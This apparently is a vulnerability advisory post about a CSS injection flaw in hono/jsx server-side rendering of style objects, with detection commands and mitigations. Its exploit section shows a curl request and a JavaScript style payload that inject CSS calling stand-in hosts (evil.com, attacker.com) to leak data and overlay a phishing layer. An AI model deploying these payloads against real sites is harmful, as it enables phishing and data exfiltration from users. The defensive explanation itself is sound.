Listen to this Post
The vulnerability stems from how the JSX renderer serializes `style` object values. During server-side rendering (SSR), untrusted input placed into a `style` object’s property name or value is escaped for the HTML attribute context but not for the CSS declaration context. Characters that function as CSS declaration boundaries—such as semicolons (;), comment markers (/ /), quoted strings (' or "), and block delimiters ({ })—are perfectly valid inside an HTML attribute. This means an attacker can supply a value like `”red; color: blue; background: url(https://attacker.net/evil.css)”` which, when serialized, breaks out of the intended CSS property and injects additional arbitrary declarations into the rendered `style` attribute.
Because the injection occurs inside the `style` attribute, HTML‑attribute escaping does not stop the attack. The inserted CSS runs in the context of the victim’s page, allowing an attacker to modify layout, hide legitimate content, create phishing overlays, or trigger network requests via CSS `url()` values. JavaScript execution is not possible, but the impact on UI integrity and data exfiltration can be severe. The issue affects all versions of `hono/jsx` before the patched release 4.12.18, and any application that interpolates user‑controlled data into a JSX `style` object on the server is at risk.
DailyCVE Form
Platform: Hono JSX SSR
Version: before 4.12.18
Vulnerability: CSS injection
Severity: Medium
Date: 2026-05-09
Prediction: 2026-05-09
Analytics (What Undercode Say)
Check current Hono version
npm list hono
Find vulnerable style object patterns
grep -rn 'style={{' --include=".jsx" --include=".tsx" .
Test CSS injection locally
curl -X POST https://target.com/api/comment -d '{"style": "red; color: blue; background: url(https://evil.com/leak)"}'
Exploit
// Attacker-controlled payload
const maliciousStyle = {
color: "red; background: url(https://attacker.com/steal); position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: 9999;"
};
// Rendered unsafely on the server
<div style={maliciousStyle}>Click here for a gift</div>
Protection from this CVE
- Upgrade `hono` to >= 4.12.18 immediately
- Sanitize all user input used in `style` objects – reject characters like
;,{,},/,/,', `”`
– Use a safe CSS‑in‑JS library that properly escapes both contexts - Apply a strict Content Security Policy (CSP) that restricts `style-src` and `connect-src` to trusted origins
Impact
- Visual manipulation – full‑viewport phishing overlays, hidden UI elements
- Data exfiltration – outbound requests to attacker‑controlled hosts using `url(…)`
– UI hijacking – alteration of layout, positioning, visibility, and user affordances
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
